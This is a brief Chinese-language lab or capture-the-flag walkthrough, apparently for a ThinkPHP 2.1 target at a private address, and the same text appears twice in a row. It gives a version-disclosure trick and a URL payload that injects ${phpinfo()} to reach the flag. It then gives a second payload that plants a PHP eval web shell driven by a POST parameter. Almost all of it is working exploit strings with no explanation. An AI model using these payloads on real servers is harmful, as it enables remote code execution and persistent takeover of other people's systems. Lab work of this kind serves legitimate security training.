打开靶场,发现是ThinkPHP
输入?s=captcha,使其报错显示版本信息
ThinkPHP 2.1漏洞
Poc
http://192.168.50.131:8080/index.php?s=/index/index/xxx(随便输)/${phpinfo()}
找到flag
写木马
http://192.168.50.131:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}
打开靶场,发现是ThinkPHP
输入?s=captcha,使其报错显示版本信息
ThinkPHP 2.1漏洞
Poc
http://192.168.50.131:8080/index.php?s=/index/index/xxx(随便输)/${phpinfo()}
找到flag
写木马
http://192.168.50.131:8080/index.php?s=/index/index/xxx/${${@eval($_POST[111])}}